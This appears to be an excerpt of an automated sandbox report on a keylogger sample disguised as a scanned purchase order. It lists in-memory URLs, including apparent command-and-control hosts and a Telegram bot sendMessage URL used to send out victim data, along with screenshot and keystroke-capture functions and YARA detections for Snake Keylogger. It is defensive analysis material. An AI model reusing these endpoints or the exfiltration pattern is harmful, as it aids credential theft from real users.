                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kafs.co.ug
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kafs.co.ugd
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.kafs.co.ug
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.kafs.co.ugd
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r11.i.lencr.org/0#
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r11.o.lencr.org0#
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1732669565.0000000003490000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1779228796.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1736661600.0000000007352000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4130484840.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4130484840.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4144722830.0000000006328000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4145363700.000000000628D000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D32000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
                  Source: HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enH
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C5F000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.81$
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E22000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F88000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DE4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000004081000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2C000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F82000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E53000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003FD0000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C7E000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E22000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F45000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CF3000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F88000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DE4000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003F5D000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4140455092.0000000004081000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003DFD000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003E28000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003F20000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4140715633.0000000003C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, HJnkiZjAPsec.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D95000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002D90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49770 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  Source: 6.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.HJnkiZjAPsec.exe.47369f0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
